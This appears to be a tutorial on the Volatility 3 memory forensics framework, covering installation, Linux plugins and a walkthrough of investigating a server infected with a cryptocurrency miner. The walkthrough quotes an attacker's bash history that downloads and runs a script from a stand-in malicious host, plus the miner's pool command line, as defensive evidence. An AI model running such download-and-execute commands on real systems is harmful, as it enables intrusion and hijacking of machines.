What is Volatility 3?

Volatility 3 is a complete rewrite of the legendary RAM dump analysis framework. If you’ve read our previous article about Volatility, you already know the concept of memory forensics. Volatility 3 serves the same purpose, but with a modern architecture, much simpler usage, and better performance.

The most important change: no more profiles. In Volatility 2, you had to manually select a profile matching the kernel version — which was frustrating and error-prone. Volatility 3 automatically reads data structures directly from the kernel’s Symbol Tables, eliminating this problem entirely.

What Changed Compared to Volatility 2?

Feature         Volatility 2          Volatility 3
Language        Python 2/3            Python 3 (exclusively)
Profiles        Required, manual      Automatic (Symbol Tables)
Command         volatility            vol (or vol3)
Plugin syntax   --profile=X pslist    linux.pslist (hierarchical)
Performance     Slower                Significantly faster
Architecture    Monolithic            Modular, easy to extend

Installation

Volatility 3 requires Python 3.7 or newer.

# Clone the repository
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3

# Install dependencies
pip3 install -r requirements.txt

# Verify it works
python3 vol.py -h

Installing Symbol Tables

Volatility 3 needs Symbol Tables matching the kernel version from the analyzed dump. For Linux, you can generate them yourself using the dwarf2json tool, or download pre-built ones from the project’s website.

# Download pre-built symbol tables for Linux
# Place them in the volatility3/symbols/ directory
ls volatility3/symbols/linux/

If Volatility 3 can’t find the appropriate table automatically, it will display an error message specifying the exact kernel version it’s looking for.

New Syntax — Key Plugins

In Volatility 3, plugins are organized hierarchically by operating system. For Linux, every plugin name begins with the linux. prefix:

Listing Processes

# Volatility 2 (old syntax):
# volatility -f dump.raw --profile=Linux_X pslist

# Volatility 3:
vol -f dump.raw linux.pslist

Process Tree

vol -f dump.raw linux.pstree

Network Connections

vol -f dump.raw linux.sockstat

Loaded Kernel Modules

vol -f dump.raw linux.lsmod

Open Files

vol -f dump.raw linux.lsof

Bash Command History

vol -f dump.raw linux.bash

Mounted Filesystems

vol -f dump.raw linux.mountinfo

Process Environment Variables

vol -f dump.raw linux.envars

Practical Example: Analyzing a Compromised Server

Scenario: Your server is behaving suspiciously — CPU load is high with no visible cause. You managed to capture a memory dump using LiME:

# Capturing memory on a live system
sudo insmod lime-$(uname -r).ko "path=/tmp/dump.raw format=raw"

Now let’s analyze the dump:

1. Listing processes:

vol -f /tmp/dump.raw linux.pslist
PID     PPID    COMM
1       0       systemd
...
4821    4820    kworkerds
4825    4821    kworkerds

We see a suspicious process kworkerds — a name deceptively similar to the legitimate kernel thread kworker, but it’s a separate process with its own PID and PPID.

2. Checking launch arguments:

vol -f /tmp/dump.raw linux.cmdline --pid 4821
PID     ARGS
4821    /tmp/kworkerds -o stratum+tcp://pool.minero.cc:5555 -u wallet123

It’s a cryptocurrency miner communicating with a mining pool.

3. Checking network connections:

vol -f /tmp/dump.raw linux.sockstat

The kworkerds process is maintaining an active TCP connection on port 5555 to an external IP address.

4. Finding out how the attacker got in:

vol -f /tmp/dump.raw linux.bash
PID     COMM    COMMAND
1102    bash    wget http://malicious.site/payload.sh -O /tmp/payload.sh
1102    bash    chmod +x /tmp/payload.sh
1102    bash    /tmp/payload.sh

The bash history reveals that the attacker downloaded and executed a malicious script.
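As an added illustration of the walkthrough above (example code written for this page, not from the original article or the Volatility project), the script below parses pslist and cmdline output in the simplified layout shown in steps 1 and 2 and applies the two checks that separate a genuine kernel thread from a lookalike such as kworkerds: real kernel threads are always children of kthreadd (PID 2) and have no backing binary on disk. The sample output is constructed, and the kernel-thread prefix list and scratch-directory list are assumptions.

```python
# Constructed sample in the layout of the `linux.pslist` output shown above.
PSLIST = """\
PID     PPID    COMM
1       0       systemd
15      2       kworker/0:1
4820    1       bash
4821    4820    kworkerds
4825    4821    kworkerds
"""
# Constructed sample in the layout of the `linux.cmdline` output shown above.
CMDLINE = """\
PID     ARGS
4821    /tmp/kworkerds -o stratum+tcp://pool.minero.cc:5555 -u wallet123
4825    /tmp/kworkerds -o stratum+tcp://pool.minero.cc:5555 -u wallet123
"""

KTHREADD_PID = 2  # every genuine kernel thread is a child of kthreadd (PID 2)
KTHREAD_PREFIXES = ("kworker", "ksoftirqd", "kswapd", "migration", "rcu_")  # illustrative
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")  # assumed list of drop locations

def parse_table(text, ncols):
    """Split plugin output into rows of ncols fields, skipping the header and '...' filler."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, ncols - 1)
        if len(parts) == ncols and parts[0].isdigit():
            rows.append(parts)
    return rows

def find_kthread_impostors(pslist_text, cmdline_text):
    """Return [(pid, comm, reasons)] for kernel-thread lookalikes that fail a parentage or origin check."""
    cmdlines = {int(pid): args for pid, args in parse_table(cmdline_text, 2)}
    hits = []
    for pid, ppid, comm in parse_table(pslist_text, 3):
        if not comm.startswith(KTHREAD_PREFIXES):
            continue
        reasons = []
        if int(ppid) != KTHREADD_PID:          # real kernel threads never have a userland parent
            reasons.append(f"ppid {ppid} is not kthreadd")
        argv = cmdlines.get(int(pid), "")
        if argv.startswith(SCRATCH_DIRS):      # kernel threads have no on-disk binary at all
            reasons.append(f"runs from {argv.split()[0]}")
        if reasons:
            hits.append((int(pid), comm, reasons))
    return hits

if __name__ == "__main__":
    for pid, comm, reasons in find_kthread_impostors(PSLIST, CMDLINE):
        print(f"PID {pid} ({comm}): {'; '.join(reasons)}")
```

On real plugin output, feed the script the text of linux.pslist and linux.cmdline; the genuine kworker/0:1 row passes both checks while both kworkerds processes are reported.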

Useful Options

  • Filtering by PID: Most plugins accept --pid to narrow results to a specific process:

    vol -f dump.raw linux.lsof --pid 4821

  • Dumping a binary from memory: To extract a suspicious binary for further analysis:

    vol -f dump.raw linux.elfs --pid 4821 --dump

  • Listing available plugins: the global help lists every plugin, so filter it by prefix to see only the Linux ones; passing --help after a plugin name shows that plugin's own options:

    vol -h | grep 'linux\.'
    vol -f dump.raw linux.pslist --help

Volatility 3 vs Live Tools

It’s worth remembering how memory dump analysis differs from tools running on a live system:

  • ps, top, ss — can be fooled by rootkits that hide processes.
  • Volatility 3 parses the raw memory image offline, so the hooks a rootkit installs to hide processes from live tools have no effect on the analysis.
  • A memory dump is a “frozen” state — nothing changes during analysis, unlike on a live system.

Summary

Volatility 3 is a huge step forward from the previous version. Automatic kernel structure recognition, a clean plugin hierarchy, and better performance make memory analysis more accessible than ever. If you were previously discouraged by the hassle of dealing with profiles in Volatility 2, now is the best time to try again.